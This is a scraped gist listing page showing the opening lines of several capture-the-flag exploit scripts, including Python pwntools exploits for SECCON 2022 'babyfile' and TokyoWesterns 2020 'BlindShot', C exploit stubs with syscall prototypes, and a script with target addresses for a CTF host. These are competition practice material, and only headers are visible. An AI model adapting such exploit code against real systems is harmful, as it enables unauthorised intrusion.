Shimizu Yutaro shift-crops
shift-crops
/ exploit_babyfile.py
Created
November 13, 2022 05:22
SECCON CTF 2022 babyfile/simplemod
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from sc_expwn import * # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py | |
| bin_file = './chall' | |
| context(os = 'linux', arch = 'amd64') | |
| # context.log_level = 'debug' | |
| #========== | |
| env = Environment('debug', 'local', 'remote') |
shift-crops
/ exploit_blindshot.py
Created
September 21, 2020 15:28
TokyoWesterns CTF 2020 BlindShot
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from sc_expwn import * # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py | |
| bin_file = './blindshot' | |
| context(os = 'linux', arch = 'amd64') | |
| # context.log_level = 'debug' | |
| #========== | |
| env = Environment('debug', 'local', 'remote') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // gcc exploit.c -masm=intel -fno-PIE -static -no-pie -o exploit | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <fcntl.h> | |
| #include <sys/mman.h> | |
| size_t read(int fd, void *buf, size_t count); | |
| size_t write(int fd, void *buf, size_t count); | |
| int open(const char* pathname, int flags, ...); | |
| int close(int fd); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // gcc exploit.c -masm=intel -fno-PIE -nostdlib -no-pie -o exploit | |
| #include <stdio.h> | |
| #include <fcntl.h> | |
| #include <sys/mman.h> | |
| size_t read(int fd, void *buf, size_t count); | |
| size_t write(int fd, void *buf, size_t count); | |
| int open(const char* pathname, int flags, ...); | |
| int close(int fd); | |
| void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // gcc exploit.c -masm=intel -fno-PIE -nostdlib -no-pie -o exploit | |
| #include <stdio.h> | |
| #include <fcntl.h> | |
| #include <sys/mman.h> | |
| size_t read(int fd, void *buf, size_t count); | |
| size_t write(int fd, void *buf, size_t count); | |
| int open(const char* pathname, int flags, ...); | |
| int close(int fd); | |
| void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // gcc exploit.c -masm=intel -fno-PIE -nostdlib -no-pie -o exploit | |
| #include <stdio.h> | |
| #include <sys/mman.h> | |
| #include <fcntl.h> | |
| size_t read(int fd, void *buf, size_t count); | |
| size_t write(int fd, void *buf, size_t count); | |
| int open(const char* pathname, int flags, ...); | |
| int close(int fd); | |
| void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| from pwnlib.elf.elf import dotdict | |
| p = lambda x: pack(x) | |
| u = lambda x: unpack(x, len(x)*8) | |
| class Environment: | |
| def __init__(self, *envs): | |
| self.__env = None |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from sc_pwn import * | |
| rhp = ("crackme.sakura.tductf.org",10773) | |
| #rhp = ("192.168.75.129",8080) | |
| addr_ret = 0x08048afc | |
| addr_got_exit = 0x0804912c | |
| addr_got_sleep = 0x0804911c | |
| addr_tmp = 0x080491a0 |